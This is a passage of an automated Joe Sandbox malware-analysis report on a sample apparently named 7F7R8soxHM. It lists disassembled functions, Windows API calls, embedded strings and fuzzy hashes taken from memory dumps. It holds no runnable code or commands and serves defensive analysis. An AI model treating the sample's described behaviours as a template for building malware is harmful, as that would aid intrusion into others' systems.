Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 9431347d6897b2ec028cc8ba4a76e374c0d614f048b6a94ed2a864b40fe533e9
Instruction ID: a72b631b7c2bc06bc4d2c2cc66c72d72d778e0b3bcce595f20384ba73dc64c1c
Opcode Fuzzy Hash: 9431347d6897b2ec028cc8ba4a76e374c0d614f048b6a94ed2a864b40fe533e9
Instruction Fuzzy Hash: 70318A32105219BFDF119FA5DC08FEA3B69EF89365F110225FA55B61A0CB31D821DBA4

Function 00E97040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E9707B

Part of subcall function 00E98D68: __getptd_noexit.LIBCMT ref: 00E98D68

__gmtime64_s.LIBCMT ref: 00E97114
__gmtime64_s.LIBCMT ref: 00E9714A
__gmtime64_s.LIBCMT ref: 00E97167
__allrem.LIBCMT ref: 00E971BD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E971D9
__allrem.LIBCMT ref: 00E971F0
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E9720E
__allrem.LIBCMT ref: 00E97225
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E97243
__invoke_watson.LIBCMT ref: 00E972B4

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction ID: 12bfc89b30320ef25891bfabd4c2ab489838032ebe219717e79482128fde77fc
Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
Instruction Fuzzy Hash: FF7108B1A18706ABDB149F79CC41B5AB3E8AF55324F14523AF454FB2C1E770EA048790

Function 00ED2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00ED2A31
GetMenuItemInfoW.USER32(00F36890,000000FF,00000000,00000030), ref: 00ED2A92
SetMenuItemInfoW.USER32(00F36890,00000004,00000000,00000030), ref: 00ED2AC8
Sleep.KERNEL32(000001F4), ref: 00ED2ADA
GetMenuItemCount.USER32(?), ref: 00ED2B1E
GetMenuItemID.USER32(?,00000000), ref: 00ED2B3A
GetMenuItemID.USER32(?,-00000001), ref: 00ED2B64
GetMenuItemID.USER32(?,?), ref: 00ED2BA9
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00ED2BEF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2C03
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2C24

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 15e837262acc33d2caea96ce032676115f6b48cfdaf7de210e491d3f440049d7
Instruction ID: 08b69baa2396e07741d32cf4a09340a522ada879f22b4e8964d80a93d26ed903
Opcode Fuzzy Hash: 15e837262acc33d2caea96ce032676115f6b48cfdaf7de210e491d3f440049d7
Instruction Fuzzy Hash: DE618EB0900249AFDB21CF64CC88DBEBBB9EB61308F14555EEA51B7351D771AD06DB20

Function 00EF7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EF7214
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EF7217
GetWindowLongW.USER32(?,000000F0), ref: 00EF723B
_memset.LIBCMT ref: 00EF724C
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EF725E
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EF72D6

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 9c3b4abba9bf910705a01a0b162f5443205b6f480c9262694018d13d511bbacf
Instruction ID: 98d2ef841e450110b2fc715511af47fbbb1c2e731810ceb59222ad198ce76166
Opcode Fuzzy Hash: 9c3b4abba9bf910705a01a0b162f5443205b6f480c9262694018d13d511bbacf
Instruction Fuzzy Hash: 03615971A00208AFDB20DFA4CC81EEE77F9AF09714F144199FA54E72A1D770AD45DB60

Function 00EC710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00EC7135
SafeArrayAllocData.OLEAUT32(?), ref: 00EC718E
VariantInit.OLEAUT32(?), ref: 00EC71A0
SafeArrayAccessData.OLEAUT32(?,?), ref: 00EC71C0
VariantCopy.OLEAUT32(?,?), ref: 00EC7213
SafeArrayUnaccessData.OLEAUT32(?), ref: 00EC7227
VariantClear.OLEAUT32(?), ref: 00EC723C
SafeArrayDestroyData.OLEAUT32(?), ref: 00EC7249
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EC7252
VariantClear.OLEAUT32(?), ref: 00EC7264
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EC726F

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: e42a0acac0697d3ade1af5c37876d3bd97f62c1b3a7b1116fd9416ef011b5a05
Instruction ID: c98c9f589dab989b422a99f54e17eb75f4ac2f2052a18c5727b5b8758731852d
Opcode Fuzzy Hash: e42a0acac0697d3ade1af5c37876d3bd97f62c1b3a7b1116fd9416ef011b5a05
Instruction Fuzzy Hash: 9E416D71A00219AFCB04DF65D948EAEBBB8FF48354F008069F955B7261CB31A94ACF90

Function 00EE5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00EE5AA6
inet_addr.WSOCK32(?), ref: 00EE5AEB
gethostbyname.WSOCK32(?), ref: 00EE5AF7
IcmpCreateFile.IPHLPAPI ref: 00EE5B05
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EE5B75
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EE5B8B
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EE5C00
WSACleanup.WSOCK32 ref: 00EE5C06

Strings

Ping, xrefs: 00EE5B29

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: caa65d604827bacb4f118cdebe8a5f0583a163b6cdfd5a6ca4607201e3e824c5
Instruction ID: d093cf8b52408801ad521f7587c772b300c696cee71e3a46fc153f46735fe7ff
Opcode Fuzzy Hash: caa65d604827bacb4f118cdebe8a5f0583a163b6cdfd5a6ca4607201e3e824c5
Instruction Fuzzy Hash: 4C51B1326047009FDB10AF26CC45B2AB7E0EF84318F14992AF559FB2A1DB70E800CF52

Function 00EDB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00EDB73B
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EDB7B1
GetLastError.KERNEL32 ref: 00EDB7BB
SetErrorMode.KERNEL32(00000000,READY), ref: 00EDB828

Strings

READONLY, xrefs: 00EDB7F3
UNKNOWN, xrefs: 00EDB7E0
NOTREADY, xrefs: 00EDB7E7
READY, xrefs: 00EDB801
INVALID, xrefs: 00EDB7FA

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 720a9e6923aec9788a30bc4f18adaacfc2916452b47b4038e6fb3058554a1cee
Instruction ID: acfeacb450a53fa58db09abd8a2348503575e4a8a660c4a825a220fd267e1f05
Opcode Fuzzy Hash: 720a9e6923aec9788a30bc4f18adaacfc2916452b47b4038e6fb3058554a1cee
Instruction Fuzzy Hash: 59319C35A00209DFDB00EF64D885AFE7BB8EF84704F11912BE506F7392EB719942DA51

Function 00EC9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82

Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00EC94F6
GetDlgCtrlID.USER32 ref: 00EC9501
GetParent.USER32 ref: 00EC951D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00EC9520
GetDlgCtrlID.USER32(?), ref: 00EC9529
GetParent.USER32(?), ref: 00EC9545
SendMessageW.USER32(00000000,?,?,00000111), ref: 00EC9548

Strings

ListBox, xrefs: 00EC94B3
ComboBox, xrefs: 00EC947E

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 00b31e976c1bf0f6ad94e254f8f8360c81797f69a69bd0d3985ca143bb472560
Instruction ID: 46be8086737b162e3a3614e4eb83d5f89ebd326d12756a759ad28b97895518bc
Opcode Fuzzy Hash: 00b31e976c1bf0f6ad94e254f8f8360c81797f69a69bd0d3985ca143bb472560
Instruction Fuzzy Hash: 6421B270A00104AFCF05AB65CCC5EFEBBA4EF85300F105129F561A72A2DB75991ADA60

Function 00EC955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E77F41: _memmove.LIBCMT ref: 00E77F82

Part of subcall function 00ECB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00ECB0E7

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00EC95DF
GetDlgCtrlID.USER32 ref: 00EC95EA
GetParent.USER32 ref: 00EC9606
SendMessageW.USER32(00000000,?,00000111,?), ref: 00EC9609
GetDlgCtrlID.USER32(?), ref: 00EC9612
GetParent.USER32(?), ref: 00EC962E
SendMessageW.USER32(00000000,?,?,00000111), ref: 00EC9631

Strings

ListBox, xrefs: 00EC959E
ComboBox, xrefs: 00EC9569

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 8d0c7f0e8329cd05af796c0dd25ffd8595234e4393ad806890ea536af78fd6e7
Instruction ID: 2a926d6013b9ea8e94e4d4cb71cc429a5762e23173e13ec5c8f8468229b54f8b
Opcode Fuzzy Hash: 8d0c7f0e8329cd05af796c0dd25ffd8595234e4393ad806890ea536af78fd6e7
Instruction Fuzzy Hash: 7121D675A00104BFDF04AB61CDC5EFEBBB4EF44300F105019F551A72E2DB75951ADA60

Function 00EC9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00EC9651
GetClassNameW.USER32(00000000,?,00000100), ref: 00EC9666
_wcscmp.LIBCMT ref: 00EC9678
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EC96F3

Strings

list, xrefs: 00EC96D5
largeicons, xrefs: 00EC9687
details, xrefs: 00EC96A1
SHELLDLL_DefView, xrefs: 00EC9672
smallicons, xrefs: 00EC96BB

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: ed0cc67349659f421a9fcc2bf435e2be976860c1e0a65e6092cfc215a91116b9
Instruction ID: ed76bc4ce7699344e0a07c639da930d4d9ba254edf61bc13e19365dc2209bc3a
Opcode Fuzzy Hash: ed0cc67349659f421a9fcc2bf435e2be976860c1e0a65e6092cfc215a91116b9
Instruction Fuzzy Hash: A911CA76248317BAFA012631ED1FEE6B7DC9F05764F20102AF900B50E2FE9399529559

Function 00EE8BC0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00EE8BEC
CoInitialize.OLE32(00000000), ref: 00EE8C19
CoUninitialize.OLE32 ref: 00EE8C23
GetRunningObjectTable.OLE32(00000000,?), ref: 00EE8D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00EE8E50
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F02C0C), ref: 00EE8E84
CoGetObject.OLE32(?,00000000,00F02C0C,?), ref: 00EE8EA7
SetErrorMode.KERNEL32(00000000), ref: 00EE8EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EE8F3A
VariantClear.OLEAUT32(?), ref: 00EE8F4A

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: e0183cd0ed33918bc892d622e2d086c61a288ad6bb41f0af2fa7dc05be7dfb0a
Instruction ID: d551765b782ee46ce7527f75a940ebfe4d2330a7cfe2accc1c69e562aefd4ec7
Opcode Fuzzy Hash: e0183cd0ed33918bc892d622e2d086c61a288ad6bb41f0af2fa7dc05be7dfb0a
Instruction Fuzzy Hash: 03C15371208349AFC704EF65C98492BB7E9FF88348F00592DF58AAB261DB71ED05CB52

Function 00ED4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00ED419D
__swprintf.LIBCMT ref: 00ED41AA

Part of subcall function 00E938D8: __woutput_l.LIBCMT ref: 00E93931

FindResourceW.KERNEL32(?,?,0000000E), ref: 00ED41D4
LoadResource.KERNEL32(?,00000000), ref: 00ED41E0
LockResource.KERNEL32(00000000), ref: 00ED41ED
FindResourceW.KERNEL32(?,?,00000003), ref: 00ED420D
LoadResource.KERNEL32(?,00000000), ref: 00ED421F
SizeofResource.KERNEL32(?,00000000), ref: 00ED422E
LockResource.KERNEL32(?), ref: 00ED423A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00ED429B

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 9607f12cb1d9a8dac6bf863694c13b0586e92340ff5327b1f747626c11977489
Instruction ID: fc764626f86826e1fda586467d89c7ef3a065758cae950f73a5392fb9b5e941a
Opcode Fuzzy Hash: 9607f12cb1d9a8dac6bf863694c13b0586e92340ff5327b1f747626c11977489
Instruction Fuzzy Hash: 9531B0B160121AAFDB119FA1DC84EBF7BADEF14301F044526F801F62A0E730DA52DBA0

Function 00ED16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00ED1700
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED1714
GetWindowThreadProcessId.USER32(00000000), ref: 00ED171B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED172A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00ED173C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED1755
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED1767
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED17AC
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED17C1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00ED0778,?,00000001), ref: 00ED17CC

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 6793be3b55c26a23c9f46d04df9def7cc2ad40119fe2668f927b9c42a1f46a74
Instruction ID: c9ac544d49a89fc236690425e7e3aaed0fe23f31c3f6af17bdca9a0d8e61c81f
Opcode Fuzzy Hash: 6793be3b55c26a23c9f46d04df9def7cc2ad40119fe2668f927b9c42a1f46a74
Instruction Fuzzy Hash: 92319FB5600308BFDB21AF25DC84B7977AAEB56725F114097F800EA3A0DB71AD85DB90

Function 00E7FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E7FC06
OleUninitialize.OLE32(?,00000000), ref: 00E7FCA5
UnregisterHotKey.USER32(?), ref: 00E7FDFC
DestroyWindow.USER32(?), ref: 00EB4A00
FreeLibrary.KERNEL32(?), ref: 00EB4A65
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EB4A92

Strings

close all, xrefs: 00E7FC01

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 913312867463e790a2de0af7444430275f243e25eae85c08d4ae64c5f522bfe7
Instruction ID: 8a661d61db741646e810f949562c9a8c13416fe492d3093c30657becf9dce33c
Opcode Fuzzy Hash: 913312867463e790a2de0af7444430275f243e25eae85c08d4ae64c5f522bfe7
Instruction Fuzzy Hash: 4AA15171701212CFCB29EF14C595A6AF7A4EF04704F54A2ADE90EBB292DB30AD16CF54

Function 00ECA693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00ECAA64), ref: 00ECA9A2

Strings

INSTANCE, xrefs: 00ECA8B0
TEXT, xrefs: 00ECA8D9
CLASS, xrefs: 00ECA721
CLASSNN, xrefs: 00ECA744
REGEXPCLASS, xrefs: 00ECA767
NAME, xrefs: 00ECA7D4

Memory Dump Source

Source File: 00000000.00000002.1648445845.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true

Associated: 00000000.00000002.1648387143.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649380226.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650417999.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654894457.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e70000_7F7R8soxHM.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: e8b034707a2f5f5d518f21248abd90cf5640daf18980011db79123bee9c6595d
Instruction ID: e924c0e6d2b7ede0300d30b22e58376a407680092d1b2facd0585765e7cc6286
Opcode Fuzzy Hash: e8b034707a2f5f5d518f21248abd90cf5640daf18980011db79123bee9c6595d
Instruction Fuzzy Hash: A491C63090020A9BDF08DF60D582FE9FBB4BF44308F54A12DE88AB7151DF31699ADB91

Function 00E72E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00E72EAE

Part of subcall function 00E71DB3: GetClientRect.USER32(?,?), ref: 00E71DDC
